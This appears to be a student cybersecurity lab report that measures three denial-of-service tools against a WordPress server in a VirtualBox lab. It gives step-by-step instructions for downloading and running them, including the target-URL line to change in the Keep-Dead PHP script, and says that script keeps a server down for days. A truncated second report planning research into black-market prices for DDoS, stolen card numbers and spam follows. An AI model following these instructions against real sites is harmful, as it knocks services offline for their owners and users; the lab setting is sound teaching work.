VirtualBox configuration manager. Secondly, the bandwidth capacity of the connection and their performance is measured by vnstat1 for graphs to display our utilization. The steps are vivid on section Methods.
Finally, providing measurement results with different proposals will help us to
identify the most beneficial proposal for above scenario, declared in Conclusion section.
Moreover, after each attack, test the virtual server environment is restarted, because of the affective situation that server after attack needs time to recover.

METHODS

Because of requirements of our scenario we need to limit the internet connection of 2
Mbit/s and to provide graphs that can help as with the measurement results to conclude which proposals is more competent. Therefore, Method 1 is describing the step how we limited the connection bandwidth and Method 2 providing as solution how to setup that can help you in measuring the speed and the bandwidth.

METHOD 1

For limiting the internet traffic of the server we have to do the following steps in command prompt. The following solution is gathered from Manual of Oracle Virtualbox, Chapter 8 [User Manual].
Limiting VirtualBox – virtual environment speed of network interface:

VBoxManage modifyvm "[name of virtualbox]" --nicspeed2 2048

Where you need to replace name of virtual box with real one, and specie which
network interface adapter you wont to limited. In the above illustration is only second
network adapter affected and then you set the limitation, in our case is 2 Mbit/s.
Furthermore, to make sure that the result have been effective please use the
following command:

VBoxManage showvminfo "[name of virtualbox]"

Results and information important to be aware refer to Appendix 1.

METHOD 2

We are going to install an application that will help us to gather a visual graphs of traffic manipulation of script kiddie. The application is vnstat.
In the server virtual environment in command prompt please type the following
command:
sudo apt-get install vnstat
Next step is to select which interface should be monitored and create graphs. In our
case is eth1, which is second network interface. For furthermore detailed installation
process please refer to the following link:
http://www.4geeksfromnet.com/2009/04/graphical-bandwidth-monitor-for-ubuntu.html
To check if the installation process is finished please use your browser, as shown in
illustration 1 and on the address bar type: http://192.168.56.102/vnstat

Illustration 1: Vnstat PHP interface

PROPOSALS

The three proposals are following and described in each different section and their results. The main measure goal which is going to grate for kiddie script is: easy to use instructions, the most efficient use of available resources and can the script be up to 1 day attacking.
Moreover, the results will be provided with two different graphs in period of 5
minutes attack and 10 minutes attack. Which would guide us to compare which kiddie
script has performed the attack more in force.

PROPOSAL 1

This is the first proposal and the installation process instruction:
Script kiddie uses a little program to connection flood the WordPress installation! The program uses Apache autobench to take the site down in seconds.
Guide for the scipt Kiddie:
1. Download the program from http://enos.itcollege.ee/~avein/anti2.rar
2. Unpack and run AntiXakkerv2.0.exe
3. Enter the address for wordpress site and press the button

Above script did no run/work on the VirtualMachine Windows XP. Therefore, from the
same author we have other solution:
1. Download http://enos.itcollege.ee/~avein/anti.exe, save in Desktop
2. Open Start menu, select run and type “cmd” into the box and press enter
3. Drag anti.exe file to the black box (commandline) , select the box and type the address of your server ( eg. www.delfi.ee ) after the anti.exe
For example, if the address for your webserver is 192.168.56.101 type the following :
anti.exe 192.168.56.101
4. Press enter and the site will go down very soon :=)
P.S. This is lightweight version tat doesnot use much bandwith and is targeted against a bug in apache server :)

RESULT 1

After running the first proposal we can see that the script kiddie does attack the server, but the server was reachable after a bit long delay, but still we could access to the wordpress.
Here are some results graphs.
1. 5 minutes attack

Illustration 2: Proposal 1, 5 min, traffic graph

2. 10 minutes attack

Illustration 3: Proposal 1, 10 min, traffic graph

On the one hand the script kiddie did attack the server, but on the other hand the
server was still accessible. I’d like to conclude by stating that the above script did not meet our needs, and it did not stop, bring down the response time of the server.

PROPOSAL 2

Second proposal and the installation process:
1. You (Script kiddie) download the file from http://share.ee/x49176f
• You will get an warning message, but you continue to download anyway
• In chrome it looks like this

2. Execute the file
• Will get a warning but continue
• Will look something like this
3. Insert the URL to attack and define how long you want to attack
• Will look like
4. Enjoy
The script is basic vbscript that will overwhelm the server by as many connections that are required to keep the server down for as long as you define.
The above script did not work on the laboratory performance, because it had an
code error. Therefore, for this proposal we are not able to provide you with the result
graphs.

PROPOSAL 3

Third proposal and the installation process is listed below:
There is a free and very easy Denial of service script written in PHP, called Keep-Dead (Version 1.14). You can download it from the following link: http://www.esrun.co.uk/blog/wp-content/uploads/2011/03/Keep-Dead.zip
It is developed for a research purpose, but still we can use it for our scenario. The good think is primarily meant for use via the terminal; although it will also work if launched via the browser.
1. Unpack the Keep-Dead.zip
2. Open in notepad or any other text/script editor
• On line #26 change the $target_url = “http://www.example.com/wordpress/?s=%rand%”; to our targeted wordpress blog. We can stop even certain page or post in wordpres or use of %rand% for a random value to be automatically generated for each individual request • You can change the maximum number of requests to be made on line #32
• Changeable is maximum number of requests to be made per connection #37, etc.
3. After setting the setting of our needs save the file.
4. And in terminal you need to run the following script: php –e keep-dead.php or if you run a xamp or other webserver it is possible to run the script from your browser.
5. You can terminate the script by pressing CTRL+C in terminal console or stop/close the browser.
For more information or video tutorials please refer to the following link: http://www.esrun.co.uk/blog/keep-alive-dos-script/

If we follow the above steps we can perform our scenario 3 to make the server to stay down for two days or even more.
There many ways to keep the server down for two days, this script for me is kind of easy usable. In addition, the author had provide and more details with following content: In addition of my proposal pls install the following script: http://windows.php.net/downloads/releases/php-5.3.8-nts-Win32-VC9-x86.msi
in the installation process in the section of Select Web Server you wish to setup please chose Do not setup a web server -> Next click on the PHP small narrow down icon and select Entire future will be installed on local hard drive (second option) -> Next ->Install
The results and graphs of the above proposal are demonstrated in the next section.
This is the script that actually does the job and it keeps the server down until the script is down.

RESULT 3

Test results are following:
1. 5 minutes attack

Illustration 4: Proposal 3, 5 min, traffic graph

2. 10 minutes attack

Illustration 5: Proposal 3, 10 min, traffic graph

A case in point is that from the above graphs we can see that the server does get
more traffic and it does get attacked by the script kiddie. Illustration 6, bellow
demonstrated that actually the server is down, is not responding any more to requests.

Illustration 6: Proposal 3, server down after trying to reach the blog

CONCLUSION

There are three points that we should consider and to see which proposal was more
accurate and it did the job that was required in the scenario.
First I would like to start with rating from 1 to 5 each proposal. Higher score present better results. Which is proving our destination to hold down the server for longer then one day. The bellow table demonstrates which proposal has succeed.

On the scoring rate 3 of server down is means that the server was down, but after
few seconds was retrievable. Where the highest score 5 means that the server was not retrievable during this proposal test until we shutdown or cancel the process of script kiddie. In addition, the Proposal 3 due to a code error was not able to perform attack, that is why it is graded with server down score of 1. Therefore, our winner for this laboratory test is Proposal 3 with script kiddie Keep-dead.
The next issue that I would like to focus is to the network speed, tested with other
tool bmon2 which manifests that the speed limit of the bandwidth did not go over the 2
Mbit/s.
In conclusion, the above proposals are nice and good example to have an view of
how and with what tools we should perform script kiddie techniques. How to shutdown access to a server. On the whole, it show as how to use tools and methods of measuring the bandwidth of network and how to limit the transfer in comfortable way.

APPENDIXES

Appendix 1 is connected with the Method 1, which highlighted points are illustration on
what information we should check, to clarify that the virtual environment has limitation of the network interface. Where Appendix 2 is for installation process of Ubuntu Server 10.04 LTS and wordpress, mysql installation.

APPENDIX 1

Name: ubuntu-server
Guest OS: Ubuntu
UUID: fe16451a-f8b1-4ceb-bb90-8650d08c3c0e
Config file: C:\Users\predrag\Documents\Master_CyberSecurity\VirtualBox VMs\
ubuntu-server\ubuntu-server.vbox
Snapshot folder: C:\Users\predrag\Documents\Master_CyberSecurity\VirtualBox VMs\
ubuntu-server\Snapshots
Log folder: C:\Users\predrag\Documents\Master_CyberSecurity\VirtualBox VMs\
ubuntu-server\Logs
Hardware UUID: fe16451a-f8b1-4ceb-bb90-8650d08c3c0e
Memory size: 512MB
Page Fusion: off
VRAM size: 12MB
CPU exec cap: 100%
HPET: off
Chipset: piix3
Firmware: BIOS
Number of CPUs: 1
Synthetic Cpu: off
CPUID overrides: None
Boot menu mode: message and menu
Boot Device (1): Floppy
Boot Device (2): DVD
Boot Device (3): HardDisk
Boot Device (4): Not Assigned
ACPI: on
IOAPIC: off
PAE: off
Time offset: 0 ms
RTC: UTC
Hardw. virt.ext: on
Hardw. virt.ext exclusive: off
Nested Paging: on
Large Pages: on
VT-x VPID: on
State: running (since 2011-10-11T11:26:30.089000000)
Monitor count: 1
3D Acceleration: off
2D Video Acceleration: off
Teleporter Enabled: off
Teleporter Port: 0
Teleporter Address:
Teleporter Password:
Storage Controller Name (0): IDE Controller
Storage Controller Type (0): PIIX4
Storage Controller Instance Number (0): 0
Storage Controller Max Port Count (0): 2
Storage Controller Port Count (0): 2
Storage Controller Bootable (0): on
Storage Controller Name (1): SATA Controller
Storage Controller Type (1): IntelAhci
Storage Controller Instance Number (1): 0
Storage Controller Max Port Count (1): 30
Storage Controller Port Count (1): 1
Storage Controller Bootable (1): on
SATA Controller (0, 0): C:\Users\predrag\Documents\Master_CyberSecurity\VirtualB
ox VMs\ubuntu-server\ubuntu-server.vdi (UUID: bf4c167a-ec0a-42fa-915f-2ffbe2fd66
fb) NIC 1: MAC: 0800274572ED, Attachment: NAT, Cable connected: on, Trace:
off (file: none), Type: 82540EM, Reported speed: 2 Mbps, Boot priority: 0, Prom
isc Policy: deny
NIC 1 Settings: MTU: 0, Socket (send: 64, receive: 64), TCP Window (send:64, re
ceive: 64) NIC 2: MAC: 0800270858EA, Attachment: Host-only Interface 'VirtualBox
Host-Only Ethernet Adapter', Cable connected: on, Trace: off (file: none), Type:
82540EM, Reported speed: 2 Mbps, Boot priority: 0, Promisc Policy: deny
NIC 3: disabled
NIC 4: disabled
NIC 5: disabled
NIC 6: disabled
NIC 7: disabled
NIC 8: disabled
Pointing Device: USB Tablet
Keyboard Device: PS/2 Keyboard
UART 1: disabled
UART 2: disabled
Audio: enabled (Driver: DSOUND, Controller: AC97)
Clipboard Mode: Bidirectional
Video mode: 640x480x0
VRDE: disabled
USB: enabled
USB Device Filters: <none>
Available remote USB devices: <none>
Currently Attached USB Devices: <none>
Shared folders: <none>
VRDE Connection: not active
Clients so far: 0
Guest: Configured memory balloon size: 0 MB
OS type: Ubuntu
Additions run level: 0
Guest Facilities: No active facilities.

APPENDIX 2

● Installation media: Ubuntu 10.04 LTS 32bit iso image;
● HW: Virtualbox, 1CPU 32bit, 512MB RAM, 8GB HD (dynamic allocation);
● NIC1 NAT;
● NIC2 host only (for ssh and http access from host);
● Language used in installation process: English and country Estonia;
● Keyboard Layout English;
● Hostname: pece
● Partition methods: Guided, use entire disk
● Username: pece
● no http proxy
● Default applications
● sudo apt-get install lamp phpmyadmin
● wget -c http://wordpress.org/latest.tar.gz
● tar xvjf latest.tar.gz
● sudo cp wordpress /var/www/wordpress
● sudo nano /var/www/wordpress/wp-config.php Change the settings to your needs

Bibliography

Script kiddie: Wikipedia, Script Kiddie, October 2011, http://en.wikipedia.org/wiki/Script_kiddie
User Manual: Oracle Corporation, User Manual, 2004-2011,
http://www.virtualbox.org/manual/ch08.html

Footnotes:

1 vnstat – http://humdi.net/vnstat/

2 Bmon – http://www.infradead.org/~tgr/bmon/

The main goal of laboratory report is to identify the costs of nowadays most known attack  DDOS, leak of credit card numbers, infected machine and never the less sending spam for 1 000 000 (one million) people. There are few points that should be presented:

• Where did we discovered the information (links or sources)
• What kind of source of communication we used, for instance: instant messing, ICQ, IRC, which contact we have gather the information
• What are the prices for the above attacks.

First of all, we must bear in mind that collecting the above information it is presented
to a numerous affected sources ( i.e. Website, news, forums, IRC chat,etc.). By visiting the source can lead you to a virus, trojan, malicious code, malware, etc. Which can damage your system. Therefore, we are going to use virtual environment to find our demands. In addition, we will use different languages and different search engines.

Construction of report is separated by tasks section. Where each section is
presented with the source, communication type and the costs of the service. In addition, in
Appendix 1 we give the configuration of virtual environment.

Finally the conclusion made of all collected data will be concise in conclusion
section.

TASKS

Following list is the numeration of the tasks:

1. DDoS
2. Credit Card Numbers
3. Infected Machines
4. Spam for 1 000 000 people

TASK 1

TASK 4